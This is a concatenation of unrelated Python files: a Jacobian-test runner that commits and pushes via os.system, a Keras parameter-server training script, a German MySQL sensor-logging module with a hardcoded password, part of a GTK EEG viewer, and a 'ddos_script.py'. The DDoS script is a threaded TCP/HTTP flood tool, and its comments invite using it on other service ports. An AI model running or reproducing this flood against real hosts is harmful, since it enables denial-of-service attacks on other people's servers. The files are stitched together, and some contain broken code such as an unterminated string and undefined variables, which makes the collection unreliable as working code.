        ``directories``/``test_names`` were mutable defaults ([PICKLE_DIRECTORY]
        and []); passing None now yields the same behaviour.
        """
        if directories is None:
            directories = [AbstractJacobianUnittest.PICKLE_DIRECTORY]
        test_names = test_names or []
        root_dir = dirname(root_module.__file__)
        local_logger = get_sos_logger('SoS.EE')
        local_logger.info(
            f'Looking for L1 tests into {root_dir}')
        l1_list = glob.glob(
            join(root_dir, file_regex))
        local_logger.info(
            f'found files {l1_list}')
        process_list = []
        for file in l1_list:
            file_module = basename(file).replace('.py', '')
            module_name = f'{root_module.__name__}.{file_module}'
            try:
                a = import_module(module_name)
                for name, obj in inspect.getmembers(a):
                    if inspect.isclass(obj) and issubclass(obj, AbstractJacobianUnittest) and name != AbstractJacobianUnittest.__name__:
                        local_logger.info(
                            f'Execute jacobian dump on {module_name}')
                        inst = obj()
                        # BUGFIX: the original passed the *result* of calling
                        # generate_analytic_gradient_pickle() as the Process
                        # target (running the work serially in the parent and
                        # giving the child target=None). Pass the bound method.
                        process_list.append(
                            Process(target=inst.generate_analytic_gradient_pickle,
                                    kwargs={'test_names': test_names}))
            except Exception as ex:
                local_logger.error(f'Error on module : {module_name}\n{ex}')
        if len(process_list) > 0:
            # Run the processes in batches of PROCESS_IN_PARALLEL.
            while len(process_list) > 0:
                candidate_process = []
                if len(process_list) > PROCESS_IN_PARALLEL:
                    candidate_process = [process_list.pop()
                                         for index in range(PROCESS_IN_PARALLEL)]
                else:
                    candidate_process = process_list
                    process_list = []
                for process in candidate_process:
                    process.start()
                for entry in candidate_process:
                    entry.join()
            for directory in directories:
                os.system(f'git add ./{directory}/*.pkl')
            os.system(f'git commit -m "regeneration of jacobian pickles for {file_regex}"')
            os.system('git pull')
            os.system('git push')
        else:
            local_logger.warning('Nothing run so nothing to commit/push')
|
ddos_script.py | import socket
import threading as thr
# first the basic information
the_target = '127.0.0.1' # this is your local machine's ip(you can also put a domain name here) use only authorized servers to run this script
port = 80 # This is the http port, but you can also attack others like: smtp port 25, ftp port 21, ssh port 22 and so on..
hoax_ip = '182.88.100.56' # this is just some manufactured ip that is supposed to be a fake ip adress
# now let's define the ddos attack
def ddos():
while True: # endless loop
x = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # AF_INET is to create internet socket with ipv4 address socket, for ipv6 just put the 6 in the end, like this AF_INET6
# SOCK_STREAM is used to create a tcp socket
x.connect((the_target, port)) # connecting to it
x.sendto(("GET /" + the_target + " HTTP/1.1\r\n").encode("ascii"), (the_target, port))
x.sendto(("Host: " + hoax_ip + "r\n\r\n").encode("ascii), (the_target, port))
x.close()
# now let's thread through this
for i in range(4500): # the number is for multithread
thread = thr.Thread(target=ddos) # after the name target put the name of the function
thread.start()
|
keras_test_ssp.py | from __future__ import print_function
import keras
from keras.datasets import cifar10
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras.applications.resnet50 import ResNet50
from keras import backend as K
import os
import numpy as np
batch_size = 64
num_classes = 10
epochs = 100
Iterations = 64000
'''
save_dir = os.path.join(os.getcwd(), 'saved_models')
model_name = 'keras_cifar10_trained_model.h5'
'''
# The data, split between train and test sets:
(x_train, y_train), (x_test, y_test) = cifar10.load_data()
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# Convert class vectors to binary class matrices.
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
'''
model = Sequential()
model.add(Conv2D(32, (3, 3), padding='same',
input_shape=x_train.shape[1:]))
model.add(Activation('relu'))
model.add(Conv2D(32, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(64, (3, 3), padding='same'))
model.add(Activation('relu'))
model.add(Conv2D(64, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(512))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes))
model.add(Activation('softmax'))
'''
base_model = ResNet50(include_top=False, weights=None,
input_shape=(32, 32, 3))
model = Sequential()
model.add(base_model)
model.add(keras.layers.Flatten())
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(128, activation='relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dropout(0.5))
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(10, activation='softmax'))
# model.summary()
# initiate RMSprop optimizer
opt = keras.optimizers.rmsprop(lr=0.0001, decay=1e-6)
# Let's train the model using RMSprop
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
zca_whitening=False, # apply ZCA whitening
zca_epsilon=1e-06, # epsilon for ZCA whitening
rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)
# randomly shift images horizontally (fraction of total width)
width_shift_range=0.1,
# randomly shift images vertically (fraction of total height)
height_shift_range=0.1,
shear_range=0., # set range for random shear
zoom_range=0., # set range for random zoom
channel_shift_range=0., # set range for random channel shifts
# set mode for filling points outside the input boundaries
fill_mode='nearest',
cval=0., # value used for fill_mode = "constant"
horizontal_flip=True, # randomly flip images
vertical_flip=False, # randomly flip images
# set rescaling factor (applied before any other transformation)
rescale=None,
# set function that will be applied on each input
preprocessing_function=None,
# image data format, either "channels_first" or "channels_last"
data_format=None,
# fraction of images reserved for validation (strictly between 0 and 1)
validation_split=0.0)
datagen.fit(x_train)
train_data = datagen.flow(x_train, y_train, batch_size=batch_size)
trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
# print the trainable_weights
trainable_parameters = [K.eval(p) for p in set(model.trainable_weights)]
print(trainable_parameters[39])
for p in set(model.trainable_weights):
K.set_value(p, np.ones(p.shape))
trainable_parameters = [K.eval(p) for p in set(model.trainable_weights)]
print(trainable_parameters[39])
#
# trainable_parameters = [ for p in set(model.trainable_weights)]
# print(trainable_parameters)
# print(np.array(model.trainable_weights))
exit()
# design ps architecture
import sys
''' import fps package '''
import fps.wrapper as fps
from multiprocessing import Process
''' rewrite run.sh in it, using os.environ '''
num_servers = 1
num_workers = 2
if len(sys.argv) > 1:
num_servers = int(sys.argv[1])
if len(sys.argv) > 2:
num_servers = int(sys.argv[2])
os.environ['DMLC_NUM_SERVER'] = str(num_servers)
os.environ['DMLC_NUM_WORKER'] = str(num_workers)
os.environ['DMLC_PS_ROOT_URI'] = '127.0.0.1'
os.environ['DMLC_PS_ROOT_PORT'] = '8000'
os.environ['DMLC_NODE_HOST'] = '127.0.0.1'
os.environ['DMLC_NODE_VHOST'] = '127.0.0.1'
def install_scheduler(name):
    """Run the parameter-server *scheduler* role in the current process."""
    print('Run scheduler task %s (%s)...' % (name, os.getpid()))
    # The fps binding reads its role from the environment.
    os.environ['DMLC_ROLE'] = 'scheduler'
    scheduler = fps.scheduler()
    scheduler.Init(0)
    scheduler.Finalize(0)
def install_server(name):
    """Run a parameter-server *server* role in the current process."""
    print('Run server task %s (%s)...' % (name, os.getpid()))
    # Role and heap-profile output path are passed via the environment.
    os.environ['DMLC_ROLE'] = 'server'
    os.environ['HEAPPROFILE'] = './S' + str(name)
    server = fps.server()
    server.Init(0)
    server.create(0)
    server.start()
    server.Finalize(0)
def install_worker(name):
    """Run a training *worker* role: train the (module-level) keras model and
    exchange parameters with the servers via fps push/pull.

    NOTE(review): relies on many module-level globals (model, train_data,
    x_test/y_test, num_servers, Iterations, batch_size, fps, np, K) -- this
    function cannot run standalone.
    """
    print('Run worker task %s (%s)...' % (name, os.getpid()))
    if name % 2 == 0:
        # NOTE(review): os.environ values must be strings; assigning an int
        # here raises TypeError at runtime -- confirm intent (should be '0'/'1').
        os.environ['CUDA_VISIBLE_DEVICES'] = 0  # use 2080ti
    else:
        os.environ['CUDA_VISIBLE_DEVICES'] = 1  # use 2070
    os.environ['DMLC_ROLE'] = 'worker'
    os.environ['HEAPPROFILE'] = './W' + str(name)
    w = fps.worker()
    w.Init(0)
    w.create(0, 0)
    # w.start() we do not need to set slicer
    '''
    do somethings like push/pull
    '''
    iter = 0
    # currently, only one server
    keys = list(range(num_servers))
    vals = []
    lens = list(range(num_servers))
    # get number of parameter
    trainable_count = int(np.sum([K.count_params(p) for p in set(model.trainable_weights)]))
    for i in range(num_servers):
        # Parameters split evenly across servers (note: float division --
        # presumably the fps binding accepts that; verify).
        lens[i] = trainable_count/num_servers
    for x_train_, y_train_ in train_data:
        if iter % 100 == 0:
            # Every 100th iteration: validated fit, then skip push/pull.
            print('The worker %s enter iteration %s' % (name, iter))
            model.fit(x_train_, y_train_,
                      batch_size=batch_size,
                      validation_data=(x_test, y_test))
            continue
        model.fit(x_train_, y_train_,
                  batch_size=batch_size, verbose=0)
        # write gradient to push
        last = w.spush(keys, vals, iter, lens)
        w.wait(w.spull(keys, iter))
        # read parameter from pull, model.trainable_weights
        ret = w.read()
        iter = iter + 1
        if iter >= Iterations:
            break;
    '''
    # Save model and weights
    if not os.path.isdir(save_dir):
        os.makedirs(save_dir)
    model_path = os.path.join(save_dir, model_name)
    model.save(model_path)
    print('Saved trained model at %s ' % model_path)
    '''
    w.wait(last)
    # NOTE(review): `repeat` is not defined anywhere visible -- this line
    # would raise NameError; confirm the intended variable (Iterations?).
    w.wait(w.spull(keys, repeat - 1))
    ret = w.read()
    print(ret)
    w.Finalize(0)
    # Score trained model.
    scores = model.evaluate(x_test, y_test, verbose=1)
    print('Test loss:', scores[0])
    print('Test accuracy:', scores[1])
# num_processes = 1 + num_servers + num_workers
# _pool = Pool(processes=num_processes)
# ret_scheduler = []
# ret_server = []
# ret_worker = []
p_arr = []
# Launch one scheduler, num_servers server and num_workers worker processes.
# The commented-out lines are an abandoned Pool.apply_async variant.
for i in range(1):
    p_arr.append(Process(target=install_scheduler, args=(i,)))
    # ret_scheduler.append(_pool.apply_async(install_scheduler, args=(i,)))
for i in range(num_servers):
    p_arr.append(Process(target=install_server, args=(i,)))
    # ret_server.append(_pool.apply_async(install_server, args=(i,)))
for i in range(num_workers):
    p_arr.append(Process(target=install_worker, args=(i,)))
    # ret_worker.append(_pool.apply_async(install_worker, args=(i,)))
for p in p_arr:
    p.start()
print('Waiting for all subprocesses done...')
for p in p_arr:
    p.join()
# _pool.close()
# _pool.join()
print('Test SSP is done.')
# for result in (ret_scheduler+ret_server+ret_worker):
#     print(result)
|
speicherung.py | import mysql.connector #Modul, dass es ermöglicht mit MySQL-Servern zu kommunizieren.
import time #Modul, zum warten im Programmcode und abrufen der aktuellen Systemzeit.
from threading import Thread #Wird dazu verwendet, Funktionen asyncron aufzurufen.
from ledController import farbeAnzeigen #Wird für die Ansteuerung der LED gebraucht.
benutzeLED = True #Gibt an, ob die LED beim Speicherb von Daten aufbliken soll.
mydb = None #Beinhaltet die Verbindung zum lokalen MySQL-Server.
# Establishes a connection to the local MySQL server.
def mitMySQLVerbinden():
    """Open the connection to the local MySQL server (stored in global mydb)."""
    global mydb
    mydb = mysql.connector.connect(
        host="localhost",
        user="airinfo",
        password="123456",  # obviously use a strong password in a real deployment
        database="airinfo"
    )
# Stores the data received from the sensors in the correct tables on the MySQL server.
def datenSpeichern(temperatur, luftdruck, feuchtigkeit):
    """Store sensor readings on the MySQL server in the right tables.

    Every call inserts into the rolling `woche` (week) table; on the full
    hour the values are additionally inserted into `gesamt` (overall).

    NOTE(review): the `feuchtigkeit` (humidity) parameter is accepted but
    never stored -- confirm whether the tables lack a humidity column or
    the INSERT statements are incomplete.
    """
    # Store the readings in "woche".
    zeiger = mydb.cursor()
    sql = "INSERT INTO woche (temperatur, luftdruck) VALUES (%s, %s)"
    daten = (temperatur, luftdruck)
    zeiger.execute(sql, daten)
    mydb.commit()
    if benutzeLED:
        # Called asynchronously via a thread so measuring can continue meanwhile.
        Thread(target=farbeAnzeigen, args=("blau",0.1)).start()  # brief blue LED blink signals data being stored
    akuelleZeit = time.localtime()
    if time.strftime("%M", akuelleZeit) == "00" and time.strftime("%S", akuelleZeit) == "00":  # check whether it is exactly a full hour
        # If so, also store the sensor data in "gesamt".
        zeiger = mydb.cursor()
        sql = "INSERT INTO gesamt (temperatur, luftdruck) VALUES (%s, %s)"
        daten = (temperatur, luftdruck)
        zeiger.execute(sql, daten)
        mydb.commit()
        if benutzeLED:
            # Called asynchronously via a thread so measuring can continue meanwhile.
            Thread(target=farbeAnzeigen, args=("blau",0.1)).start()  # brief blue LED blink signals data being stored
# Removes data older than 7 days from "woche".
def datenBereinigen():
    """Delete rows older than 7 days from the `woche` table."""
    cleanup_sql = "DELETE FROM woche WHERE `zeitpunkt` < DATE_ADD(CURDATE(), INTERVAL -7 DAY)"
    cursor = mydb.cursor()
    cursor.execute(cleanup_sql)
    mydb.commit()
viewerwidgets.py | # -*- coding: utf-8 -*-
import os.path
import sys
import time
from threading import Thread, Lock
import pickle
#Eigene Imports
import eegpy
from eegpy.formats import f32
from eegpy.misc import FATALERROR
from eegpy.ui.icon import image_from_eegpy_stock, eegpy_logo
from eegpy.ui.widgets.dialogwidgets import show_info_dialog
from markerwidgets import Marker, MarkerWithAverage
from trigmanwidgets import TriggerManager
from eegpy.analysis.wavelet import wavedec_lin
try:
import pygtk
pygtk.require('2.0')
import gobject
import gtk
except ImportError:
raise FATALERROR('GTK cannot be imported.')
from numpy import *
try:
import matplotlib
from matplotlib.axes import Subplot
from matplotlib.mlab import specgram
# uncomment to select /GTK/GTKAgg/GTKCairo
from matplotlib.backends.backend_gtk import FigureCanvasGTK as FigureCanvas
# or NavigationToolbar for classic
from matplotlib.backends.backend_gtk import NavigationToolbar2GTK as NavigationToolbar
#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg, NavigationToolbar
from matplotlib.figure import Figure, SubplotParams
from matplotlib.axis import Axis
import matplotlib.cm as cm
except ImportError:
raise FATALERROR('Error while importing matplotib. Please visit http://matplotlib.sf.net for more information.')
try:
import pywt
except ImportError:
raise FATALERROR('PyWavelet not found.')
class EEGPlot:
programName = "eegpy Viewer 0.0.3"
offset=100
f32Loaded = False
chList = []
data=[]
ovData = []
ovTs = []
ts=[]
fn = "/media/Extern/public/Experimente/AudioStroop/2008-01-21_Leon_AS/eeg/leon_leerlauf_f.f32" #None
reader = None
markerfilename = None
markerparser = None
markMaker=None
trigManager=None
timesOffset = 0
tsFactor = 1 #Faktor für Umrechnung der Zeiten, wird wichtig beim zeichnen der Markers
boolPlotMarkers = True
OvThread = None
f32Lock = Lock()
panePosDef = 0
showAnalysis = False # Wenn True, dann wird eine Analyse des ersten ausgewählten Kanals gezeigt.
whichAnal = "Specgram"
# Konstruktor
def __init__(self,fn=None):
gobject.threads_init()
self.setupGUI()
if fn==None:
self.set_filename("/media/Extern/public/Experimente/AudioStroop/2008-01-21_Leon_AS/eeg/leon_leerlauf_f.f32")
else:
self.set_filename(fn)
# Our callback.
# The data passed to this method is printed to stdout
def callback(self, widget, data=None):
print "Hello again - %s was pressed" % data
def cb_plot(self,widget,data=None):
self.plot()
def cb_plotOverview(self,widget,data=None):
self.plot_overview()
def cb_canvas(self, event):
if event.inaxes == self.a2:
#print "In Übersicht"
self.sbStartpoint.set_value(event.xdata)
self.plot()
elif event.inaxes == self.a:
#print event.xdata, event.ydata
if self.markMaker != None:
self.markMaker.add(event.xdata)
self.plot_data()
#pass
#mrkr = Marker()
def cb_col_toggled( self, cell, path, user_data):
model, column = user_data
model[path][column] = not model[path][column]
#print model, path, model[path][column]
if column == 2:
self.plot()
else:
self.plot_data()
return
def cb_MvAccels(self, action):
#print "Hallo",
#print action.get_name()
if not self.f32Loaded:
return False
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
if action.get_name() == "Llleft":
start=start-int(5*length*stride)
elif action.get_name() == "Lleft":
start=start-int(1*length*stride)
elif action.get_name() == "Left":
start=start-int(0.2*length*stride)
elif action.get_name() == "Right":
start=start+int(0.2*length*stride)
elif action.get_name() == "Rright":
start=start+int(1*length*stride)
elif action.get_name() == "Rrright":
start=start+int(5*length*stride)
if start < 0:
start=0
if start+stride*length>self.reader.numDatapoints:
start=self.reader.numDatapoints-stride*length
self.sbStartpoint.set_value(start)
self.plot()
def cb_MvButtons(self, widget):
if not self.f32Loaded:
return False
start=int(self.sbStartpoint.get_value())
length=int(self.sbNDataP.get_value())
stride=int(self.sbStride.get_value())
if widget == self.btLlleft:
start=start-int(5*length*stride)
elif widget == self.btLleft:
start=start-int(1*length*stride)
elif widget == self.btLeft:
start=start-int(0.2*length*stride)
elif widget == self.btRight:
start=start+int(0.2*length*stride)
elif widget == self.btRright:
start=start+int(1*length*stride)
elif widget == self.btRrright:
start=start+int(5*length*stride)
if start < 0:
start=0
if start+stride*length>self.reader.numDatapoints:
start=self.reader.numDatapoints-stride*length
self.sbStartpoint.set_value(start)
#self.plot()
def cb_SelAccels(self, action):
def select(model, path, iter,data):
if data=="all":
model.set_value(iter,2,True)
elif data=="none":
model.set_value(iter,2,False)
return False # keep the foreach going
#print "Hallo",
#print action.get_name()
if not self.f32Loaded:
return False
if action.get_name() == "PlotAll":
self.tree.foreach(select,"all")
elif action.get_name() == "PlotNone":
self.tree.foreach(select,"none")
self.setup_subplots()
self.plot()
def cb_activate_radio_action(self, action, current):
self.whichAnal = current.get_name()
self.plot_data()
#print 'Radio action "%s" selected, %s'% (current.get_name(),action.get_name())
def cb_SpinBs(self, widget):
if not self.f32Loaded:
return False
if widget in [self.sbStartpoint, self.sbNDataP, self.sbStride]:
self.setup_subplots()
self.plot()
elif widget == self.sbScale:
self.offset = self.sbScale.get_value()
#print "Offset: %f" % self.offset
self.plot_data()
def cb_showAnalysis(self, widget):
if widget == self.btAnal:
self.showAnalysis = not self.showAnalysis
self.setup_subplots()
self.plot()
def cb_open(self, b):
dialog = gtk.FileChooserDialog("Open f32-File..", None, gtk.FILE_CHOOSER_ACTION_OPEN, (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OPEN, gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
filter = gtk.FileFilter()
filter.set_name("EEG f32")
filter.add_pattern("*.f32")
dialog.add_filter(filter)
filter = gtk.FileFilter()
filter.set_name("All files")
filter.add_pattern("*")
dialog.add_filter(filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
self.set_filename(dialog.get_filename())
#print dialog.get_filename(), 'selected'
elif response == gtk.RESPONSE_CANCEL:
print 'Closed, no files selected'
dialog.destroy()
pass
def cb_startMarking(self, b):
if self.markMaker == None:
self.markMaker = MarkerWithAverage(self)
else:
try:
self.markMaker.window.show_all()
except AttributeError,e:
"markMaker ist irgendwie falsch..."
def cb_manageTriggers(self, b):
if self.trigManager == None:
self.trigManager = TriggerManager(self)
else:
try:
self.trigManager.window.show()
#self.trigManager.mainBox.show_all()
except AttributeError,e:
"trigManager ist irgendwie falsch..."
def cb_about(self, b):
text = """This is the %s.
It is the EEG-Viewer supplied with eegpy, an open-source project
for the analysis of eeg-data.
More informations are available at our website, http://eegpy.sf.net."""%(self.programName)
show_info_dialog("About",text)
def cb_quit(self, b):
    """Menu callback: hide the main window and leave the GTK main loop."""
    self.window.hide()
    gtk.main_quit()
def addLine(self, widget, data=None):
    """Insert a new top-level row into the channel tree store.

    Column 0 is set to the constant 1, column 1 to the supplied `data`
    string (presumably a channel label — TODO confirm against callers).
    """
    #print "Hello again - %s was pressed" % data
    # renamed from `iter`: avoid shadowing the `iter` builtin
    row = self.tree.insert_before(None, None)
    self.tree.set_value(row, 0, 1)
    self.tree.set_value(row, 1, data)
# This callback quits the program
def delete_event(self, widget, event, data=None):
    """Window delete-event handler: stop the GTK main loop.

    Returning False lets GTK proceed with destroying the window.
    """
    gtk.main_quit()
    return False
def set_filename(self, fn):
    """Set the filename to use, check if file exists and start f32reader """
    # reset all per-file state before attempting to load
    self.fn = fn
    self.chList = []
    self.data=[]
    self.ovData = []
    self.ovTs = []
    self.f32Loaded = False
    if os.path.exists(self.fn):
        try:
            self.reader = f32.F32(self.fn,"r")
            self.f32Loaded = True
            self.window.set_title(self.programName + " - " + self.fn)
            # fill the channel list (number, name, plot?, highlight?)
            self.tree.clear()
            #base = self.tree.append(None)
            #self.tree.set(base ,1,"Channels:")
            i=0
            for c in self.reader.channel_names:
                iter = self.tree.append(None)
                self.tree.set(iter, 0,i , 1,c, 2,True, 3,False)
                #print i, c
                #self.tree.set_value(iter, 0, c)
                i += 1
            self.pane.set_position(self.panePosDef)
            #self.scale_startpoint["to"] = self.reader.numDatapoints-self.scale_nDataP["from"]-1
            # limit the start spin button to the file length
            self.sbStartpoint.set_adjustment(gtk.Adjustment(0,0,self.reader.numDatapoints-100-1,100,1000))
            self.a.clear()
            #self.plot()
            # plot the overview
            #gtk.gdk.threads_enter()
            #self.OvThread = Thread(target=self.getOvData)
            #self.OvThread.start()
            self.get_overview_data()
            # auto-load an accompanying trigger file if one exists
            evt_exts = [".evt",".vmrk"]
            for e in evt_exts:
                if os.path.exists(os.path.splitext(self.fn)[0]+e):
                    self.cb_manageTriggers(None)
                    self.trigManager.add(os.path.splitext(self.fn)[0]+e)
                    break
            self.plot()
            #gtk.gdk.threads_leave()
        except Exception, e:
            # loading failed: forget the filename and report the error
            self.fn= None
            #tkMessageBox.showwarning("Falsches Format","Dies ist keine gültige f32-Datei!")
            print e
def setupGUI(self):
    """Build the main window: menu, panes, spin boxes, buttons, canvas, tree."""
    # Create a new window
    self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
    self.window.set_default_size(700,500)
    self.window.set_title(self.programName)
    # Set a handler for delete_event that immediately
    # exits GTK.
    self.window.connect("delete_event", self.delete_event)
    # Sets the border width of the window.
    self.window.set_border_width(0)
    self.mainBox = gtk.VBox()
    self.window.add(self.mainBox)
    self.setup_menu()
    # horizontal pane: plot area on the left, channel tree on the right
    self.hpane = gtk.HPaned()
    self.mainBox.pack_start(self.hpane)
    # vertical pane: controls on top, plot below
    self.pane = gtk.VPaned()
    self.hpane.add1(self.pane)
    #self.window.add(self.pane)
    #self.upperTable = gtk.Table(1, 3)
    self.bTable = gtk.Table(3, 6, True)
    self.vbox = gtk.VBox()
    self.hbox = gtk.HBox()
    self.hbox2 = gtk.HBox()
    self.pane.add1(self.hbox)
    self.pane.add2(self.hbox2)
    self.hbox2.pack_start(self.vbox)
    self.setup_SpinBoxes()
    self.setup_buttons()
    self.setup_canvas()
    self.vbox.pack_start(self.toolbar, False, False)
    self.setup_TreeView()
    self.window.set_icon_list(eegpy_logo("small"))#, eegpy_logo("large"))
    self.window.show_all()
    # remember the default pane position so set_filename() can restore it
    self.panePosDef = self.pane.get_position()
def setup_menu(self):
    """Create the menu bar via gtk.UIManager: actions, accelerators and
    the radio group that selects the analysis mode."""
    # XML layout consumed by gtk.UIManager (action names must match below)
    self.ui = '''<ui>
<menubar name="MenuBar">
<menu action="File">
<menuitem action="Open"/>
<menuitem action="Marks"/>
<menuitem action="Triggers"/>
<separator/>
<menuitem action="Quit"/>
</menu>
<menu action="Movement">
<menuitem action="Llleft"/>
<menuitem action="Lleft"/>
<menuitem action="Left"/>
<menuitem action="Right"/>
<menuitem action="Rright"/>
<menuitem action="Rrright"/>
</menu>
<menu action="ChSel">
<menuitem action="PlotAll"/>
<menuitem action="PlotNone"/>
<menuitem action="PlotMarked"/>
<menuitem action="NotPlotMarked"/>
</menu>
<menu action="Analysis">
<menuitem action="Specgram"/>
<menuitem action="XCorr"/>
<menuitem action="Avg"/>
<menuitem action="Wavelet"/>
</menu>
<menu action="Help">
<menuitem action="About"/>
</menu>
</menubar>
</ui>'''
    # Create a UIManager instance
    self.uimanager = gtk.UIManager()
    # Add the accelerator group to the toplevel window
    self.accelgroup = self.uimanager.get_accel_group()
    self.window.add_accel_group(self.accelgroup)
    # Create an ActionGroup
    actiongroup = gtk.ActionGroup('UIManagerExample')
    self.actiongroup = actiongroup
    # Create a ToggleAction, etc.
    #actiongroup.add_toggle_actions([('Mute', None, '_Mute', '<Control>m',
    #                                 'Mute the volume', self.mute_cb)])
    # Create actions: file handling plus keyboard navigation accelerators
    actiongroup.add_actions([('Open', gtk.STOCK_OPEN, '_Open f32-file', None, 'Open an f32-file from the file-system', self.cb_open),
                             ('Marks', None, '_Mark time-points', "<Control>m", 'Mark timepoints in file for later use', self.cb_startMarking),
                             ('Triggers', None, 'Manage _trigger-files', "<Control>t", 'Manage the external trigger-files used for displaying certain events in the eeg.', self.cb_manageTriggers),
                             ('Quit', gtk.STOCK_QUIT, '_Quit me!', None,'Quit the Program', self.cb_quit),
                             ('File', None, '_File'),
                             ('Movement', None, '_Movement'),
                             ('Analysis', None, '_Analysis'),
                             ('Mute', None, '_Mute'),
                             ('Llleft', None, "5x Left" , "<Control><Alt><Shift>Left", "Llleft", self.cb_MvAccels),
                             ('Lleft', None, "1x Left" , "<Control><Alt>Left", "Lleft", self.cb_MvAccels),
                             ('Left', None, "0.2x Left" , "<Control>Left", "Left", self.cb_MvAccels),
                             ('Right', None, "0.2x Right" , "<Control>Right", "Right", self.cb_MvAccels),
                             ('Rright', None, "1x Right" , "<Control><Alt>Right", "Rright", self.cb_MvAccels),
                             ('Rrright', None, "5x Right" , "<Control><Alt><Shift>Right", "Rrright", self.cb_MvAccels)])
    # channel-selection helpers
    actiongroup.add_actions([('ChSel', None, '_Channel-Selection'),
                             ('PlotAll', None, 'Mark all channels for plotting', None, 'Mark all channels for plotting', self.cb_SelAccels),
                             ('PlotNone', None, "Unmark all channels" , None, None, self.cb_SelAccels),
                             ('PlotMarked', None, "Mark selected channels" , None, None, self.cb_SelAccels),
                             ('NotPlotMarked', None, "Unmark selected" , None, None, self.cb_SelAccels)])
    actiongroup.add_actions([('About', None, "About" , None, None, self.cb_about),
                             ('Help', None, '_Help')])
    # radio actions choosing which analysis plot_data() shows
    (ANAL_SPEC,ANAL_XCORR,ANAL_AVG) = range(3)
    anal_entries = (
        ( "Specgram", None, # name, stock id
          "_Spectogram", None, # label, accelerator
          "Show a spectogram in the Analysis-window", ANAL_SPEC ), # tooltip, value
        ( "XCorr", None, # name, stock id
          "_Cross-correlation", None, # label, accelerator
          "Compute the cross-correlation", ANAL_XCORR ), # tooltip, value
        ( "Avg", None, # name, stock id
          "_Average over channels", None, # label, accelerator
          "Compute the average over channels", ANAL_AVG ), # tooltip, value
        ( "Wavelet", None, # name, stock id
          "_Wavelet", None, # label, accelerator
          "Wavelet-decomposition of the signal", ANAL_AVG )
    )
    actiongroup.add_radio_actions(anal_entries, ANAL_SPEC, self.cb_activate_radio_action)
    #actiongroup.get_action('Quit').set_property('short-label', '_Quit')
    # Add the actiongroup to the uimanager
    self.uimanager.insert_action_group(actiongroup, 0)
    # Add a UI description
    self.uimanager.add_ui_from_string(self.ui)
    # Create a MenuBar
    self.menuBar = self.uimanager.get_widget('/MenuBar')
    self.frMenuBar = gtk.Frame()
    self.frMenuBar.set_property("shadow-type", gtk.SHADOW_OUT)
    #self.menuBar = gtk.MenuBar()
    self.frMenuBar.add(self.menuBar)
    #self.frMenuBar.show_all()
    self.mainBox.pack_start(self.frMenuBar,expand=False)
def setup_SpinBoxes(self):
    """Create the four view-control spin buttons: start, datapoints, stride, scale."""
    self.frameSBs = gtk.Frame("Adjust View")
    self.hbox.pack_start(self.frameSBs,expand=False,padding=50)
    self.tableSBs = gtk.Table(4,2,False)
    self.frameSBs.add(self.tableSBs)
    # start sample of the displayed window
    self.tableSBs.attach(gtk.Label("Start"),0,1,0,1)
    self.sbStartpoint = gtk.SpinButton(gtk.Adjustment(0,0,10000,100,1000))
    self.sbStartpoint.connect("value_changed",self.cb_SpinBs)
    self.tableSBs.attach(self.sbStartpoint,1,2,0,1)
    # number of datapoints to show
    self.tableSBs.attach(gtk.Label("Datapoints"),0,1,1,2)
    self.sbNDataP = gtk.SpinButton(gtk.Adjustment(1100,100,20000,100,1000))
    self.sbNDataP.connect("value_changed",self.cb_SpinBs)
    self.tableSBs.attach(self.sbNDataP,1,2,1,2)
    # decimation stride (take every n-th sample)
    self.tableSBs.attach(gtk.Label("Stepsize"),0,1,2,3)
    self.sbStride = gtk.SpinButton(gtk.Adjustment(5,1,400,1,100))
    self.sbStride.connect("value_changed",self.cb_SpinBs)
    self.tableSBs.attach(self.sbStride,1,2,2,3)
    # vertical offset between channel traces
    self.tableSBs.attach(gtk.Label("Scale"),0,1,3,4)
    self.sbScale = gtk.SpinButton(gtk.Adjustment(100,1,10000,10,100))
    self.sbScale.connect("value_changed",self.cb_SpinBs)
    self.tableSBs.attach(self.sbScale,1,2,3,4)
    for i in [self.sbStartpoint, self.sbNDataP, self.sbStride, self.sbScale]:
        i.set_numeric(True)
def setup_buttons(self):
    """Create movement buttons, plot buttons, time-unit radios and the analysis toggle."""
    # Create move-buttons
    self.btLlleft = gtk.Button("<<<")
    self.btLlleft.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btLlleft, 0, 1, 0, 1)
    #self.btLlleft.show()
    self.btLleft = gtk.Button("<<")
    self.btLleft.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btLleft, 1, 2, 0, 1)
    #self.btLleft.show()
    self.btLeft = gtk.Button("<")
